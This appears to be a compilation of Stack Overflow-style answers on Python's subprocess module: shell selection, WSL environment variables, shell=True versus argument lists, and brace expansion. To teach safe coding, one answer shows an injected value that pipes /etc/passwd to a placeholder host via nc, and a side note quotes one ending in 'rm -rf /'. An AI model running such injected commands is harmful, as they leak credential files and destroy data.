I'm using Ubuntu 20 with zsh. When I use subprocess.call, it always uses bash to execute the command, not zsh. How can I fix this?
No, it uses sh regardless of what your login shell is.
There is a keyword argument to select a different shell, but you should generally run as little code as possible in a subshell; mixing nontrivial shell script with Python means the maintainer has to understand both languages.
whatever = subprocess.run(
    'echo $SHELL',
    shell=True, executable='/usr/bin/zsh',
    check=True)
(This will echo your login shell, so the output would be /usr/bin/zsh even if you ran this without executable, or with Bash instead.)
In many situations, you should avoid shell=True entirely if you can.
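For instance, a minimal sketch of the list form (the directory /tmp is just an example):

```python
import subprocess

# Passing a list avoids the shell entirely: each element reaches the
# program verbatim, so there is no word splitting or injection to worry about.
result = subprocess.run(
    ['ls', '-l', '/tmp'],
    check=True, capture_output=True, text=True)
print(result.stdout)
```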
Related
I am trying to call mvn commands from Python; for this, the subprocess module has to be used.
The problem is that this has been working for a long time and all of a sudden it does not work anymore: the executed Maven commands complain about JAVA_HOME not being set, even though it is set when I manually type echo $JAVA_HOME into the shell.
I have no idea why it stopped working all of a sudden.
What I would expect
command = "echo $JAVA_HOME"
proc = subprocess.Popen(['bash', '-c', command],
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                        stdin=subprocess.PIPE)
output, err = proc.communicate()
print(str(output))
prints the path to my Java JDK.
$ echo $JAVA_HOME
prints the path to my Java JDK.
What happens instead
command = "echo $JAVA_HOME"
proc = subprocess.Popen(['bash', '-c', command],
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                        stdin=subprocess.PIPE)
output, err = proc.communicate()
print(str(output))
prints b'\n'
$ echo $JAVA_HOME
prints path/to/my/java/jdk
What I already tried
Using shell=True in Popen: works, but is discouraged due to security risks, and it seems to use /bin/sh when executed on our Jenkins, which makes the script crash because some commands are only executable with bash. It worked without it before, so there must be a way to get along without it.
Adding env=os.environ.copy() as an argument to Popen: no effect, even when specifying JAVA_HOME explicitly via env.
Moving the JDK to a path without spaces or other unusual characters: no effect.
Checking the output of os.environ['JAVA_HOME']: prints the path to my Java JDK.
Information
I am still using the same Python version. I did not update anything that could have caused this weird behavior all of a sudden; at least, I wouldn't know what it was.
I am using Windows 10 Enterprise, x64-based
I am using Git Bash
I am using Python 3.8.5
Update 1:
After reading about problems with environment variables shared between WSL and Windows, I discovered that I can share specific variables by setting the environment variable WSLENV. I added JAVA_HOME/p to it, and now the Python subprocess no longer prints b'\n' but b'/tmp/docker-desktop-root/mnt/host/c/Users/user/Desktop/jdk11\n'. So the problem seems to be WSL (?).
Unfortunately, Maven still says JAVA_HOME should point to a JDK, not a JRE, so this path does not seem to work.
Update 2:
By changing the WSLENV variable's content from JAVA_HOME/p to JAVA_HOME/u, the subprocess now prints the correct path to the JDK. Still, Maven fails with the same error message.
Update 3:
For making it work with WSL enabled, check out my answer below
I found a way to make it work with WSL enabled; it is kinda ugly, but it seems to work.
command = "mvn --version"
proc = subprocess.Popen(['wsl', 'bash.exe', '-c', command],
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                        stdin=subprocess.PIPE)
output, err = proc.communicate()
print(str(output))
print(str(err))
By prepending wsl and bash.exe I managed to make it work; the output is the usual output of mvn --version, just as expected. Notice the .exe, which seems to tell WSL to use the same bash executable as in normal usage without subprocess.
Without the .exe, WSL seems to use a different bash executable, where JAVA_HOME is not defined, or at least Maven complains about it with the error message I already mentioned above.
Notice that this code probably won't work when WSL is not enabled, so you would need to programmatically test whether WSL is enabled and modify the command accordingly.
I'm still searching for a solution where I don't need to modify the process args; I will update this answer if I find one.
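A hypothetical sketch of such a test, using shutil.which to probe for a wsl launcher on PATH (the plain-bash fallback here is my assumption, not part of the answer above):

```python
import shutil

command = "mvn --version"

# Prepend the WSL wrapper only when a `wsl` launcher is actually on PATH;
# otherwise fall back to plain bash.
if shutil.which('wsl'):
    argv = ['wsl', 'bash.exe', '-c', command]
else:
    argv = ['bash', '-c', command]

print(argv)
```

The resulting argv can then be handed to subprocess.Popen exactly as in the snippet above.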
I am a beginner in Python; can you kindly help me understand the following concept?
If I do the following,
import subprocess
subprocess.run(['ls'])
Here we know that the keyword argument shell is set to False by default, so 'ls' does not run in a shell. But my question is: if it does not run in a shell, where does it run, and how can it give me output?
I have a Windows system, but it should work the same.
To get the output of a subprocess, you can use check_output.
On Windows:
import subprocess
subprocess.check_output(["dir"], shell=True)
Running this code without shell=True will result in an error, because dir is a cmd.exe built-in rather than a standalone executable.
If I want to run the code above with shell=False, I would do something like this:
subprocess.check_output(["cmd","/c","dir"], shell=False)
Note:
On Unix with shell=True, the shell defaults to /bin/sh.
That means when you pass a command string with shell=True, it will use /bin/sh to run that command.
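A quick way to see this on Unix (a sketch; the exact output depends on your environment):

```python
import subprocess

# With shell=True, /bin/sh expands $HOME before echo runs;
# without a shell, the literal string '$HOME' would be printed instead.
out = subprocess.check_output('echo $HOME', shell=True)
print(out)
```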
I'm trying to kill a specific Python process launched earlier; let's call it test.py.
The command on Linux which terminates it is sudo pkill -f test.py, and it works like a charm.
However, when trying to launch it via Python code:
subprocess.Popen('sudo pkill -f test.py', stdout=subprocess.PIPE)
I get a stacktrace with OSError: [Errno 2] No such file or directory
Any idea what am I doing wrong?
By default, subprocess.Popen will interpret a string argument as the exact command name. So, if you pass the string foo bar, it will attempt to locate an executable named foo bar and invoke it without arguments. Unlike an interactive shell, it will not execute the command foo with the single argument bar.
When you type foo "bar baz" or foo | bar into a shell, it is the shell that splits the command line into words and interprets those words as the command name, arguments, pipe delimiters, redirection operators, and so on. The simplest way to get subprocess.Popen to do the same kind of input interpretation is to pass shell=True, which requests that the argument be run through a shell:
subprocess.Popen('sudo pkill -f test.py', shell=True, stdout=subprocess.PIPE)
Unfortunately, as noted in the documentation, this convenient shortcut has security implications. Using shell=True is safe as long as the command to run is fixed (ignoring the obvious security implications of allowing apparently password-less sudo). The problem arises when the arguments are assembled from pieces that come from other sources. For example:
# XXX security risk
subprocess.Popen('sudo pkill -f %s' % socket.read(), shell=True,
                 stdout=subprocess.PIPE)
Here we are reading the argument from a network connection and splicing it into a string passed to the shell. Aside from the obvious problem of a maliciously crafted peer being able to kill an arbitrary process on the system (as root, no less), it is actually worse than that. Since the shell is a general-purpose tool, an attacker can use command substitution and similar features to make the system do anything they want. For example, if the socket sends the string $(cat /etc/passwd | nc SOMEHOST; echo process-name), the Popen above will use the shell to execute:
sudo pkill -f $(cat /etc/passwd | nc SOMEHOST; echo process-name)
This is why it is generally advised not to use shell=True on untrusted input. A safer alternative is to avoid running the shell:
# smaller risk
cmd = ['sudo', 'pkill', '-f', socket.read()]
subprocess.Popen(cmd, stdout=subprocess.PIPE)
In this case, even if a malicious peer slips something weird into the string, it will not be a problem because it will be literally sent to the command to execute. In the above example, the pkill command would get a request to kill a process named $(cat ...), but there would be no shell to interpret this request to execute the command inside the parentheses.
Even without a shell, invocation of external commands with untrusted input can still be unsafe in case the command executed (in this case sudo or pkill) is itself vulnerable to injection attacks.
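When a shell truly cannot be avoided, shlex.quote can neutralize an untrusted string before it is spliced into the command. (This is a side note of mine, not part of the answer above.)

```python
import shlex
import subprocess

# Hypothetical untrusted input containing a command substitution.
untrusted = "$(cat /etc/passwd); rm -rf /"

# shlex.quote wraps the string so the shell sees one literal word,
# not code to execute.
cmd = 'echo %s' % shlex.quote(untrusted)
out = subprocess.check_output(cmd, shell=True)
print(out)
```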
I wrote a simple piece of code:
import subprocess
p=subprocess.Popen('mkdir -p ./{a,b,c}', shell=True, stderr=subprocess.STDOUT)
p.wait()
Unfortunately, it does not always behave the way I'd expect. For example, when I run it on my PC, everything is OK (ls -l shows three dirs: a, b and c). But when my colleague runs it on his desktop, he gets... one dir named '{a,b,c}'. We both use Python 2.7.3. Why is that? How would you fix it?
I tried to find the answer by myself. According to manual:
"args should be a sequence of program arguments or else a single string. By default, the program to execute is the first item in args if args is a sequence. If args is a string, the interpretation is platform-dependent and described below. See the shell and executable arguments for additional differences from the default behavior. Unless otherwise stated, it is recommended to pass args as a sequence."
So I tried to execute the code in shell:
python -c "import subprocess; p=subprocess.Popen(['mkdir', '-p', './{ea,fa,ga}'], shell=True, stderr=subprocess.STDOUT); p.wait()"
And I got:
mkdir: missing operand
I will be thankful for any advice
Thanks!
The ./{a,b,c} syntax is bash syntax, not supported by all shells.
The documentation says:
On Unix with shell=True, the shell defaults to /bin/sh. If args is a
string, the string specifies the command to execute through the shell.
So your command only works if /bin/sh is symlinked to a shell that supports that syntax, like bash or zsh. Your colleague is probably using dash or another shell that doesn't support this.
You should not be relying on something like the user's default shell. Instead, write the command with the expansion spelled out:
p = subprocess.Popen('mkdir -p ./a ./b ./c', shell=True, stderr=subprocess.STDOUT)
There are several problems here.
First: if you are using a sequence of arguments, do not set shell=True (this is recommended in the Popen manual). Set it to False, and you'll see that your mkdir command will be accepted.
./{a,b,c} is, AFAIK, bash-specific brace-expansion syntax. If your colleague is using a different shell, it will probably not work, or will behave differently.
You could use Python's own mkdir function instead of calling a shell command; it will work whatever the server, shell or OS.
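For example, a shell-free sketch of mkdir -p ./a ./b ./c (using a temp directory so the example is self-contained; exist_ok needs Python 3):

```python
import os
import tempfile

base = tempfile.mkdtemp()  # stand-in for the current directory
for name in ('a', 'b', 'c'):
    # exist_ok=True mirrors mkdir -p: no error if the directory exists
    os.makedirs(os.path.join(base, name), exist_ok=True)
print(sorted(os.listdir(base)))
```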
Thank you all for your answers.
It seems that the best way is simply to use /bin/sh syntax. I changed my code to use:
'mkdir -p ./a ./b ./c'
as you suggested.
I avoided using the mkdir() function because I am writing scripts with plenty of system calls, and I wanted to provide an elegant --dry-run option (so I could list all of the commands).
Problem solved - thank you!
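The --dry-run idea mentioned above can still be had without shell=True; here is a hypothetical sketch where every command is a plain argument list that can be printed either way:

```python
import subprocess

def run(argv, dry_run=False):
    """Print the command line; execute it only when dry_run is False."""
    cmd = ' '.join(argv)
    print(cmd)
    if not dry_run:
        subprocess.check_call(argv)
    return cmd

# With dry_run=True the command is only listed, never executed.
run(['mkdir', '-p', './a', './b', './c'], dry_run=True)
```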
The os.mkdir(path[, mode]) method is, as far as I understand, safer to use when working on multi-platform projects.
os.mkdir(os.path.join(os.getcwd(), 'a'))
However, it's not as elegant as the subprocess approach.
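On Python 3.5+, pathlib offers a slightly tidier spelling of the same thing (sketched here in a temp directory so it is self-contained):

```python
import tempfile
from pathlib import Path

base = Path(tempfile.mkdtemp())
# parents=True and exist_ok=True together mirror `mkdir -p`
(base / 'a' / 'deep').mkdir(parents=True, exist_ok=True)
print((base / 'a' / 'deep').is_dir())
```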
I am trying to create aliases for tcsh from a Python script (running Python 2.7.1).
Once the aliases are created, I want to use them in the same shell I ran the Python script in.
I tried:
os.system('alias test "echo test"')
but I get the following error:
sh: line 0: alias: test: not found
sh: line 0: alias: echo test: not found
I then tried:
os.system(r"""/bin/csh -i -c 'alias test "echo test"'""")
And then no errors occurred, but the alias did not register, and therefore I could not use it.
The result I'm looking for is this:
tcsh>python my_script.py
tcsh>test
test
Thanks!
os.system executes that command in a subshell (the Bourne shell, by the look of it), so even if your syntax was correct (alias test="echo test"), it would not persist after the call, since the subshell closed.
But this seems like an XY question. You ask about Y - the solution you had in mind, and not about X - your problem.
If you simply want to create a bunch of aliases at once, why not use a c-shell script? (Why you are torturing yourself with c-shell is another matter entirely.)
Your python script cannot execute anything in the context of your shell. While you could use subprocess.call(..., shell=True) this would use a new shell and thus not update your existing shell.
The only way to do what you want is to make your python script write valid shell commands to stdout and then, instead of just executing it, you need to make your shell evaluate the output of your python script.
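A hypothetical sketch of that pattern: the script only prints csh alias commands, and the calling shell evaluates them. (The file name my_aliases.py and the single alias are just examples.)

```python
# my_aliases.py (hypothetical name): emit csh alias commands on stdout.
# Nothing in this script touches the parent shell directly.

def alias_commands():
    # csh syntax: alias NAME "COMMAND"
    return ['alias test "echo test"']

if __name__ == '__main__':
    print('\n'.join(alias_commands()))
```

In tcsh you would then run something like eval `python my_aliases.py` so the aliases land in the current shell (exact quoting may need adjustment if the script emits multiple lines).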